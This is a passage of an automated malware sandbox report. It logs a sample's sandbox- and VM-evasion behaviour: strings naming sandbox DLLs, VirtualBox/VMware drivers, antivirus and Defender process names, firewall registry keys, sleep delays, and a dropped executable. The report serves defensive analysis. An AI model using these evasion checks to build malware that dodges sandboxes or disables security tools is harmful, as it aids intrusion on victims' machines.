                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: DIR_WATCH.DLL
                      Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLL%02XEVERYONECURRENT_USER0X%08XSB:0X%08XG:%S_0X%08X_%C:%S_V1$G:%S_0X%08XOPENMSCOREE.DLLSOFTWARE\MICROSOFT\INTERNET EXPLORER\MAINSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\%U2500ISOLATIONPMILNOPROTECTEDMODEBANNERYESCHECK_ASSOCIATIONSSOFTWARE\MICROSOFT\INTERNET EXPLORER\MAINIEXPLORE.EXESOFTWARE\CLIENTS\STARTMENUINTERNETIE.HTTPPROGIDSOFTWARE\MICROSOFT\WINDOWS\SHELL\ASSOCIATIONS\URLASSOCIATIONS\HTTP\USERCHOICEIE.HTTPSSOFTWARE\MICROSOFT\WINDOWS\SHELL\ASSOCIATIONS\URLASSOCIATIONS\HTTPS\USERCHOICESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.HTM\USERCHOICESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.HTML\USERCHOICEIE.ASSOCFILE.HTMCHROME.EXEFIREFOX.EXEOPERA.EXESAFARI.EXE360BROWSER.EXEMAXTHON.EXESVCVERSIONSOFTWARE\MICROSOFT\INTERNET EXPLORERVERSIONCURRENTVERSIONSOFTWARE\MOZILLA\MOZILLA FIREFOXHTTP\SHELL\OPEN\COMMANDSTART PAGEAPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMANDIEX(X86)%S\INTERNET EXPLORER\IEXPLORE.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\%SFLAGSCOOKIE:MOZILLA\FIREFOX\PROFILESCOOKIES.SQLITEERP~DCEN7ZXY~CXE7:7DND~YCREYV{D-7```9DND~YCREYV{D9TXZX[[NSUPDXQC`VERK^ZZBY~CN7^YTPZREZXY~CXE~YP7:7VG^7ZXY~CXE7A%7$%:U~CGEXTZXYH@^YSX@HT[VDDC^SV@~YSX`DNDCRZKTXYCEX{DRC''&KDREA~TRDKS~D|KRYBZAZ`VERAUXODNDCRZKTBEERYCTXYCEX{DRCKDREA~TRDKAZ`VERDXQC@VERKAZ`VER;7^YT90LIBRARYINDOTASKMGR.EXEPROCEXP.EXE\DESKTOPDOCUMENTS%S\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_*6.0.*_*%S\WINSXS\%S\COMCTL32.DLLK32GETMAPPEDFILENAMEWPSAPI.DLLGETMAPPEDFILENAMEWSYSTEMMANUFACTURERHARDWARE\DESCRIPTION\SYSTEM\BIOSVMWARSYSTEMBIOSVERSIONHARDWARE\DESCRIPTION\SYSTEMVBOXDRIVERSVBOXVIDEO.SYSVBOXGUEST.SYSVMHGFS.SYSPRL_BOOT.SYSJJ8J^QPEJJ8J@TYNQCSEBCMD.EXEPROCESSORNAMESTRINGHARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0DG_SSUDBUSAPPLE MOBILE DEVICESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION%S\%SDEPLOYMENT.SECURITY.LEVEL=MEDIUM
                      Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: API_LOG.DLL
                      Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: ELEVATION:ADMINISTRATOR!NEW:\DEVICE\HARDDISK0\PARTITION\??\PHYSICALDRIVE0WINE_GET_VERSIONWINE_GET_UNIX_FILE_NAMEPRODUCTID76487-640-1457236-2383776487-337-8429955-2261476487-644-3177037-2351076497-640-6308873-2383555274-640-2673064-2395076487-640-8834005-2319576487-640-0716662-2353576487-644-8648466-2310600426-293-8170032-8514676487-341-5883812-2242076487-OEM-0027453-63796SANDBOXSAND BOXMALWAREMALTESTTEST USERTRANSPARENTENABLEDPOLICYSCOPEDEFAULTLEVELITEMDATADESCRIPTIONSYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\%SSTANDARDPROFILEENABLEFIREWALLPUBLICPROFILESTANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST%S:*:ENABLEDWUAUSERVWSCSVCBITSMPSSVCSHAREDACCESSAVCUF32.DLL.KASPERSKY.COM.DRWEB.COMSYMANTEC.COM.AVAST.COM.AVG.COM.PANDASECURITY.COM.NAI.COMTRENDMICRO.COM.AVIRA.COM.COMODO.COM.SOPHOS.COMKAVDUMPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORERHIDESCAHEALTHTASKBARNONOTIFICATIONRSTRUI.EXESOFTWARE\MICROSOFT\INTERNET EXPLORER\SETUP\%SDONOTALLOWIE1112.0DONOTALLOWIE12WINDEFENDMRTSTUB.EXEMRT.EXERAPPORTMGMTSERVICETR*S*EE*\RA*POR*T\*RAPPORTSETUP.EXEWINDOWS DEFENDER%PROGRAMW6432%%PROGRAMFILES%WINDOWS DEFENDER\MSASCUI.EXEMPCMDRUN.EXEMSMPENG.EXEMPSVC.DLLNISSRV.EXEMSSECES.EXEMSASCUI.EXEMSCMSMPSVCAVG_UIAVGWDAVGUI.EXEAVGIDSAGENT.EXEAVGWDSVC.EXEAVGDIAGEX.EXEAVGMFAPX.EXEAVGUPD.EXEAVGCFGEX.EXEAVGCSRVA.EXE*AVIRAAVGNTANTIVIRSERVICEUPDATE.DLLUPDATERC.DLLUPDATE.EXEUPDRGUI.EXEAVWEBLOADER.EXEAVGNT.EXEAVGUARD.EXEAVSHADOW.EXEAVCENTER.EXEUSRREQ.EXEAVPAVP15.0.0AVP15.0.1K*A*S*P*E*R*Y*\*AVP.EXEAVPUI.EXECCSVCHST.EXESAV INSTALL DIRECTORYSOFTWARE\SYMANTEC\SYMANTEC ENDPOINT PROTECTION\INSTALLEDAPPSNAVNISN360NAVW32.EXENORTON SECURITYSOFTWARE\SYMANTEC\INSTALLEDAPPSSYMANTECNORTONSYMERR.EXE.EXENIS.EXENAV.EXEN360.EXENS.EXE.EXNIS.EXENAV.EXEENDPOINT PROTECTIONNAVWNT.EXECLTLMH.EXEAVAST! ANTIVIRUSAVASTAVASTUI.EXESETUPAVASTUI.EXEAVASTEMUPDATE.EXEAVASTSVC.EXEASHUPD.EXEASHQUICK.EXESCHED.EXEINSTUP.EXEAVASTPROGRAM *\PROGRAM FILES*\*AV*T SOF*ARE\AV*\A*UI.EXEAV*TSVC.EXEAV*T*M*UPD*.EXEAS*PD.EXEAS*UI*K.EXESCH*D.EXESET*P\IN*T*P.EXESET*P\A*BUGR*P*RT.EXE*.EXEWRSA.EXEWRSVCZATRAY.EXEFORCEFIELD.EXEZONEALARMUPDATING.DLLFSHOSTER32.EXEFSHOSTERFSAUA.DLLPSUNMAIN.EXEPSUAMAINPSUNSCAN.DLLPSANUPGMGR.DLLPSUAMAIN.EXEPSANCU.EXESOFTWARE\PANDA SOFTWAREPAVJOBS.EXEAVENGINE.EXEUPGRADER.EXEAD-AWARE SERVICELAVASOFTADAWARESERVICE11ADAWARE.EXEADAWARESERVICE.EXEBULLGUARDBULLGUARD.EXE.MANIFESTBULLGUARDUPDATE.EXEBULLGUARD.EXEBULLGUARDSCANNER.EXEBULLGUARDBHVSCANNER.EXEBULLGUARDUPDATE2.EXEBGSCAN.EXEBGSCANENGINE.DLLRSMGRSVC.MANIFESTUPDATER.EXEBACKUP\RSD\RSSETUP\UPDATER.EXERSTRAY.EXERAVMOND.EXERSMGRSVC.EXERSMAIN.EXEINSTALLPATHSOFTWARE\RISING\RAVRSSCAN.DLLRSTRAY.DLLMBAMSERVICEMBAMGUI.EXEMBAMDOR.EXEMBAM.EXEMBAMSERVICE.EXEMBAMSCHEDULER.EXEPCTSGUI.EXEPCTSAUXS.EXEPCTSSVC.EXEISTRAYUPDATE.EXEUPDATEHLPR.DLLSBAMTRAYSBAMUI.EXESBAMTRAY.EXEDEFINITIONS\VCORE.DLLF-PROT ANTIVIRUS TRAY APPLICATIONUPDATER_CLIENT_MOD.DLLFPROTTRAY.EXEFPWIN.EXESOPHOS AUTOUPDATE MONITORDATA PATH
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeFile opened / queried: VBoxGuest
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Windows\SysWOW64\drivers\prl_boot.sys
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Windows\SysWOW64\drivers\vmhgfs.sys
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeFile opened / queried: HGFS
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Windows\SysWOW64\drivers\vboxguest.sys
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Windows\SysWOW64\drivers\vboxvideo.sys
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 742
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 765
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 749
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 742
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 704
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 697
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 689
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 671
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 658
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 650
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 635
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 621
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5772
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 476
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6849
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 508
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 2964Thread sleep time: -66500s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5764Thread sleep time: -36000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 204Thread sleep time: -1380000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4624Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6012Thread sleep count: 742 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6012Thread sleep time: -44520s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4328Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4532Thread sleep count: 765 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4532Thread sleep time: -45900s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6008Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 996Thread sleep count: 749 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 996Thread sleep time: -44940s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4860Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 2212Thread sleep count: 742 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 2212Thread sleep time: -44520s >= -30000s
